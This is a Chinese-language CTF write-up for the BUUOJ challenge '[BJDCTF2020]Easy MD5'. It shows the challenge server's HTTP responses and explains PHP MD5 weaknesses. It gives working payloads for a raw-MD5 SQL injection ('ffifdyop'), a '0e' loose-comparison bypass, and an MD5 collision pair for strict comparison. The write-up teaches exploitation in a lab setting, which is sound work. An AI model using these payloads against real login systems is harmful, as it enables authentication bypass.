[BJDCTF2020]Easy MD5

一只本本發表於2024-11-20
TF2

題目連結:https://buuoj.cn/challenges#[BJDCTF2020]Easy MD5

開啟環境後如下所示。

響應包如下。

HTTP/1.1 200 OK
Server: openresty
Date: Fri, 25 Oct 2024 15:20:01 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.3.13
hint: select * from 'admin' where password=md5($pass,true)
Cache-Control: no-cache
Content-Length: 3107

<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <style>
        @media all and (min-width:600px) {
            * {
                /*改變width計算為包含邊框和內間距*/
                box-sizing: border-box;
            }

            body {
                /*控制頁面內容水平和垂直居中*/
                position: relative;
                display: flex;
                height: 550px;
                align-items: center;
                justify-content: center;
                background-size: cover;
                background-repeat: no-repeat;
            }

            /*container*/
            .container {
                border: rgba(240, 235, 235, 0.932) solid 3px;
                box-shadow: 10px 10px 10px rgba(173, 173, 173, 0.61);
                background-color: white;
                width: 30%;
                height: 20%;
                border-radius: 8px;
                position: relative;
            }

            /*container end*/

            /*header*/
            #header h1 {
                position: relative;
                text-align: center;
            }

            /*header end*/
            /*main*/
            .main {
                align-items: center;
                justify-content: center;
                position: relative;
                width: 100%;
                height: 100%;
            }

            .main section {
                width: 50%;
                margin-left: 22%;
            }

            .main section .upload {
                width: 400px;
            }

            .main section .upload .in{
                margin-top: 10%;
                border-radius:10px;
                font-size: 17px;
                color: rgba(44, 44, 44, 0.582);
                font-family: "Microsoft YaHei";
                border: rgba(240, 235, 235, 0.932) solid 3px;
                box-shadow: 10px 10px 10px rgba(173, 173, 173, 0.61);
                background-color: white;
            }

            .main section .upload .give{
                margin-left: 10px;
                border-radius:10px;
                color: rgba(44, 44, 44, 0.582);
                font-size: 17px;
                font-family: "Microsoft YaHei";
                border: white solid 3px;
                background-color: white;
            }

            /*main end*/
        }
    </style>
</head>

<body>
    <div class="container">
        <div id="header">
        </div><!-- /header end -->
        <div class="main">

            <section>
                <form class="upload" action="leveldo4.php" method="GET">
                    <input type="text" id="name" name='password' class="in">
                    <input type="submit" class="give">
                </form>
            </section>
        </div><!-- /main end -->

    </div><!-- /container end -->
    <script src="https://code.jquery.com/jquery-3.1.1.min.js"></script>
</body>

</html>

可以發現,在 HTTP 標頭中存在一個 "hint",即:select * from 'admin' where password=md5($pass,true)

當 PHP 的 md5 函式的第二個引數為 True 時,輸出的結果將會是原始 16 字元二進位制格式,而字串 "ffifdyop" 的 MD5 值(原始 16 字元二進位制格式)為:'or'6É]™é!r,ùíb,這將會導致引號閉合,並且判斷永為真。

Payload:?password=ffifdyop

題目重定向到 "levels91.php",響應包如下。

HTTP/1.1 200 OK
Server: openresty
Date: Fri, 25 Oct 2024 15:22:09 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.3.13
Cache-Control: no-cache
Content-Length: 780

<!--
$a = $GET['a'];
$b = $_GET['b'];

if($a != $b && md5($a) == md5($b)){
    // wow, glzjin wants a girl friend.
-->

<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <style>
        span {
            position: relative;
            display: flex;
            width: 100%;
            height: 700px;
            align-items: center;
            font-size: 70px;
            font-family:'Lucida Sans', 'Lucida Sans Regular', 'Lucida Grande', 'Lucida Sans Unicode', Geneva, Verdana, sans-serif;
            justify-content: center;
        }
    </style>
</head>

<body>
    <span>Do You Like MD5?</span>
</body>

</html>

可以看到,響應包中插入了一些註釋。

<!--
$a = $GET['a'];
$b = $_GET['b'];

if($a != $b && md5($a) == md5($b)){
    // wow, glzjin wants a girl friend.
-->

這裡又需要引入 PHP 的 md5 函式的另外特性,即,PHP 在處理雜湊字串時,如果透過 "!=" 或 "==" 來對雜湊值進行比較時,PHP 會把每一個以 "0e" 開頭的雜湊值都解釋為 "0",所以如果兩個不同的密碼經過雜湊以後,其雜湊值都是以 "0e" 開頭的,那麼 "PHP" 將會認為他們相同,都是 "0"。

// 一些雜湊值為 "0e" 開頭的字串

QNKCDZO
0e830400451993494058024219903391

s878926199a
0e545993274517709034328855841020

Payload:?a=QNKCDZO&b=s878926199a

在傳送 Payload 後,響應包中又提示跳轉到 "levell14.php"。該檔案如下所示。

題目使用了強比較對比 MD5,因此直接蒐集一些相同 MD5 值,卻不同的字串進行提交即可。

Payload:param1=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2&param2=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2

相關文章